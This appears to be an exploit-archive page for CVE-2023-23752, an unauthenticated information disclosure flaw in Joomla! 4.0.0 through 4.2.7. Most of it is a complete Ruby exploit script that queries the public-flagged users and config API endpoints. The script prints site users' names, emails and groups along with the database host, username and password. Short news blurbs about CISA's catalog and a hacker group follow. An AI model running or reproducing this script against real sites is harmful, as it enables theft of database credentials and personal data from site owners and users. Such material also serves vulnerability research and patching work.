Headline
Joomla! 4.2.7 Unauthenticated Information Disclosure
Joomla! versions prior to 4.2.8 suffer from an unauthenticated information disclosure vulnerability.
#!/usr/bin/env ruby# Exploit## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752## Date: 2023-03-24## Vendor Homepage: https://www.joomla.org/## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)## Tested on: Joomla! Version 4.2.7## CVE : CVE-2023-23752# Vulnerability## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab## Date: 2023-02-24## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/## Title: Joomla Unauthorized Access## CVE: CVE-2023-23752## Patch: Update to >= 4.2.8## References:## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752## - https://vulncheck.com/blog/joomla-for-rce## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml# standard libraryrequire 'json'# gemsrequire 'httpx'require 'docopt'require 'paint'doc = <<~DOCOPT #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]} #{Paint['Usage:', :red]} #{__FILE__} <url> [options] #{__FILE__} -h | --help #{Paint['Parameters:', :red]} <url> Root URL (base path) including HTTP scheme, port and root folder #{Paint['Options:', :red]} --debug Display arguments --no-color Disable colorized output (NO_COLOR environment variable is respected too) -h, --help Show this screen #{Paint['Examples:', :red]} #{__FILE__} http://127.0.0.1:4242 #{__FILE__} https://example.org/subdir #{Paint['Project:', :red]} #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec) #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis) #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)DOCOPTdef fetch_users(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/users?public=true" http.get(vuln_url)enddef parse_users(root_url, http) data_json = fetch_users(root_url, http) data = JSON.parse(data_json)['data'] users = [] data.each do |user| if user['type'] == 'users' id = user['attributes']['id'] name = user['attributes']['name'] username = user['attributes']['username'] email = user['attributes']['email'] groups = user['attributes']['group_names'] users << {id: id, name: name, username: username, email: email, groups: groups} end end usersenddef display_users(root_url, http) users = parse_users(root_url, http) puts Paint['Users', :red, :bold] users.each do |u| puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}" endenddef fetch_config(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true" http.get(vuln_url)enddef parse_config(root_url, http) data_json = fetch_config(root_url, http) data = JSON.parse(data_json)['data'] config = {} data.each do |entry| if entry['type'] == 'application' key = entry['attributes'].keys.first config[key] = entry['attributes'][key] end end configenddef display_config(root_url, http) c = parse_config(root_url, http) puts Paint['Site info', :red, :bold] puts "Site name: #{c['sitename']}" puts "Editor: #{c['editor']}" puts "Captcha: #{c['captcha']}" puts "Access: #{c['access']}" puts "Debug status: #{c['debug']}" puts puts Paint['Database info', :red, :bold] puts "DB type: #{c['dbtype']}" puts "DB host: #{c['host']}" puts "DB user: #{Paint[c['user'], :yellow, :bold]}" puts "DB password: #{Paint[c['password'], :yellow, :bold]}" puts "DB name: #{c['db']}" puts "DB prefix: #{c['dbprefix']}" puts "DB encryption #{c['dbencryption']}"endbegin args = Docopt.docopt(doc) Paint.mode = 0 if args['--no-color'] puts args if args['--debug'] http = HTTPX display_users(args['<url>'], http) puts display_config(args['<url>'], http)rescue Docopt::Exit => e puts e.messageend
Related news
A vulnerability in the popular Joomla! CMS has been added to CISA's known exploited vulnerabilities catalog.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.
By Waqas Yet another day, yet another threat actor posing a danger to the cybersecurity of companies globally. This is a post from HackRead.com Read the original post: New Hacker Group GambleForce Hacks Targets with Open Source Tools
A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023. "GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.